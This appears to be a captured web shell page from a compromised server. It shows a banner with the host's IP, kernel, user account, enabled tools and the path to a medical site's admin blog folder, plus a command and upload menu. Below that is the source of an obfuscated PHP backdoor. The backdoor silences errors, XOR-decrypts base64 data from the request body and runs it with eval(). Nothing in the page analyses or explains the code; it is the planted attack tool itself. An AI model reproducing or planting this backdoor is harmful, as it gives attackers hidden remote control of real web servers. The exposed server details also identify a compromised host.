Server IP : 162.214.80.37 / Your IP : 216.73.216.173 Web Server : Apache System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : imyrqtmy ( 2189) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/imyrqtmy/public_html/medicpartner/admin/blogs/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php @error_reporting(0); function Decrypt($data) { $i1 = strpos($data, "<arg0>") + 6; $i2 = strpos($data, "</arg0>"); $i3 = strpos($data, "<condition>") + 11; $i4 = strpos($data, "</condition>"); $a = substr($data, $i1, $i2-$i1); $b = substr($data, $i3, $i4-$i3); $c = base64_decode($a); $d = base64_decode($b); for ($i = 0; $i < strlen($d); $i++) { $d[$i] = chr(ord($d[$i]) ^ ord($c[($i+12)%strlen($c)])); } return $d; } $post=Decrypt(file_get_contents("php://input")); eval($post); ?>